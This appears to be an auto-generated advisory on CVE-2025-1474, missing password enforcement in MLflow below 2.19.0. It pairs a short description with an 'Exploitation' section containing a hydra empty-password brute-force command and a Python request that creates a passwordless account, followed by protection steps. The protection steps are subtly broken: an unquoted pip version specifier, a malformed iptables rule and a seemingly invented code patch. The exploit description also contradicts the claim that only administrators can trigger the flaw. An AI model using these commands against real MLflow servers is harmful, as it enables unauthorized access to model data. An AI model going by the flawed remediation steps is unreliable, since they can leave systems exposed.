How CVE-2025-1474 Works
In MLflow versions before 2.19.0, administrators can create user accounts without setting passwords due to improper validation in the user creation API. This flaw allows attackers to exploit accounts with empty credentials, leading to unauthorized access. The vulnerability stems from missing backend checks during user registration, permitting NULL password entries. Attackers can brute-force or directly log into these accounts, escalating privileges or accessing sensitive ML model data. The CVSS 4.0 score reflects high exploitability (Attack Vector: Network, Complexity: Low) and impact (Confidentiality/Integrity: High).
DailyCVE Form:
Platform: MLflow
Version: <2.19.0
Vulnerability: Missing Password Enforcement
Severity: Critical
Date: 03/27/2025
What Undercode Say:
Exploitation:
1. Brute-Force Empty Credentials:
hydra -L users.txt -p "" -t 4 http-post://<mlflow-server>/login
2. API Exploit (Python):
import requests
target = "http://mlflow-server/api/2.0/mlflow/users/create"
headers = {"Content-Type": "application/json"}
data = {"username": "exploit_user", "password": None}
response = requests.post(target, json=data, headers=headers)
Protection:
1. Upgrade:
pip install mlflow>=2.19.0
2. Manual Patch: Enforce password checks in `mlflow/server/handlers.py`:
def validate_password(password):
if not password or len(password) < 8:
raise ValueError("Password required")
3. Network Controls:
iptables -A INPUT -p tcp --dport 5000 -s !trusted_ip -j DROP
Analytics:
- Attack Surface: Exposed `/api/2.0/mlflow/users/create` endpoints.
- Detection: Logs with `POST /users/create` and NULL passwords.
- Mitigation Rate: 100% post-2.19.0.
References:
No further commentary.
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-1474
Extra Source Hub:
Undercode
